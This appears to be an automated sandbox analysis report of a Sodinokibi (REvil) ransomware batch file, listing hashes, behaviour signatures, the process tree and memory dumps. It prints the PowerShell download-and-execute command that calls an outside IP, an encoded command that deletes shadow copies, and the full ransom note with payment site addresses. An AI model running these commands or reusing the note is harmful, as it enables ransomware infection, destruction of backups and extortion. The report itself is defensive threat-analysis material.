Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    14-08-2020 13:10

General

  • Target

    02e935713bd82b8d92596478da846147.bat

  • Size

    222B

  • MD5

    709373b57a3c4758065b1f72f1a19b2d

  • SHA1

    b820438ee7bcc43e84373b68f9fec3bedc10c25a

  • SHA256

    ab2207ca32e7d0e2434060e8a2d6cb8bf247c9d3174fe86c5c06fb0100c31838

  • SHA512

    d5061ac40ed9258dcb412dcf5eb05fe716affcd44a388b81b9b89e29317f51138fc8e7a13d1f195a5d3647736aea67c66a1d73fb4cff70406851cd2c29f1816f

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/02e935713bd82b8d92596478da846147

Extracted

Path

C:\69j456788-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 69j456788. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A3AEEB525E171025 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/A3AEEB525E171025 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: F3NiOjPjLLzI77e87APzvT22+TI3HufgJwxluqialaiEds+IUwO4kYjlg+7gzrvq PVT/kub253am8WL+DUZPMjW2XPcKIlmmfiK4UH/HB1boKr8kBCh56YWV/6hjn1NK yH1Ti47R4FtObahDFOYHOw6dcf1/nwMCgqEfISqTC4viGkhTps2fi1pnAtl5oUKk N8r+aAIk2qV0UHR058soZjhSZh3C5po8dBIj8Ra1CNKb1gPEnHF9Eb7HuuGHomWf YCfXPc/ks3P+Lc6bnMqfmQjaTd8iqoXy+1BCcssozHJ4zjMBdB80DbY3XXEgIZ7q Sl/vTROY9pf3z8RkhbkJQgF3453cATDnVdTws2jy9pygh8cBK9VoKGg9oJhzz0uS ZhzQP6ueD7aAxssnLkRr8bzvW+4Bb54xAYQXTrzrq152iLo+jTjvbuOuRqAo64xO ngalcw+OzvMe7oFFLjPn8VAXyHLldD/GjPYWZVTjUVA836lKRfPYSOa56WVSs8rM 04QkrDCAMDmhrEErz5nw2EEckgKNrwpNp8iX/D5/0IfFuMLCHcTPKwTZ1QoEL/id BZ2jMBzLmu3n4qKAimI+TaXkA1ICY+BqHO2I7mIDjBJlj/icx63LDyr/02rltuF/ 5LK+QgTqGu2MVBSCPuVvNtbhB1M/tfwdh4U/2mGsaI277A2+7doD4Ts5yqJIXNx7 O80S3os0yM9PJVj0T9yWLwKZEF0quxOELGRaetrHQL/MOpqgcPInfCYh+3RYkblf iHPuhmNzq3NPOQ2KXx8CELdcdA43tkulhuHqBJV6In3z0TW5hyQvQ3lfQvYDBM+D IJQyi2cv2Iwk26XkR3DGzRnq3sE4TKcrftNl5ZYipi7Yms9UwFYogKtNDY0nchcP yaiYXCVft19NeLgBjubRCbTCh8FOMo1URv3SzqYIoAxXLS7TeZukvqwqNJDLIbjz aE+ACsztL1gliIuZODhPzAejXmK8oDQTyto/flT7ZsvQbAKwIEwzB3QNYOCYy09z W6LDV62w+MehsRaHFYXlOCcluHOjsYom6xv8pSYyvfiz6ZX6/hYXNmayjXh/lL4m O1grc8TKeolJoMZ7C8pp0DEakGT9wk+Zlkl452+r94Fj038OuQLO9Zy7jIAbey+j wMk/6vjXgrmBqSPoi4RCauRjKsvLEBhPcmBak2G2Jfn3qsCB1dChJeXprmotf9Jv wmvTEtFVdWF/AjipxkRQYvinQ7D78MHvadjNMLHfeMxdusd3idw/JVuK1pBFRmvY MluyfZnxhUt+ervbrWzmf6HpjkArdA== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A3AEEB525E171025

http://decryptor.cc/A3AEEB525E171025

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Blacklisted process makes network request 62 IoCs
  • Modifies extensions of user files 9 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 35 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\02e935713bd82b8d92596478da846147.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1908
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/02e935713bd82b8d92596478da846147');Invoke-WIWBLXHVRXNAAOB;Start-Sleep -s 10000"
      2⤵
      • Blacklisted process makes network request
      • Modifies extensions of user files
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3052
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3184
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1144

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3052-0-0x0000000000000000-mapping.dmp

  • memory/3052-1-0x00000000740F0000-0x00000000747DE000-memory.dmp

    Filesize

    6.9MB

  • memory/3052-2-0x0000000000DE0000-0x0000000000DE1000-memory.dmp

    Filesize

    4KB

  • memory/3052-3-0x0000000006ED0000-0x0000000006ED1000-memory.dmp

    Filesize

    4KB

  • memory/3052-4-0x0000000006BD0000-0x0000000006BD1000-memory.dmp

    Filesize

    4KB

  • memory/3052-5-0x0000000006D70000-0x0000000006D71000-memory.dmp

    Filesize

    4KB

  • memory/3052-6-0x0000000006DE0000-0x0000000006DE1000-memory.dmp

    Filesize

    4KB

  • memory/3052-7-0x00000000076E0000-0x00000000076E1000-memory.dmp

    Filesize

    4KB

  • memory/3052-8-0x0000000006EA0000-0x0000000006EA1000-memory.dmp

    Filesize

    4KB

  • memory/3052-9-0x0000000007AB0000-0x0000000007AB1000-memory.dmp

    Filesize

    4KB

  • memory/3052-10-0x0000000007DB0000-0x0000000007DB1000-memory.dmp

    Filesize

    4KB

  • memory/3052-11-0x00000000094E0000-0x00000000094E1000-memory.dmp

    Filesize

    4KB

  • memory/3052-12-0x0000000008A60000-0x0000000008A61000-memory.dmp

    Filesize

    4KB

  • memory/3184-13-0x0000000000000000-mapping.dmp

  • memory/3184-14-0x00000000740F0000-0x00000000747DE000-memory.dmp

    Filesize

    6.9MB

  • memory/3184-24-0x0000000009490000-0x0000000009491000-memory.dmp

    Filesize

    4KB

  • memory/3184-26-0x0000000009440000-0x0000000009441000-memory.dmp

    Filesize

    4KB

  • memory/3184-27-0x0000000009CD0000-0x0000000009CD1000-memory.dmp

    Filesize

    4KB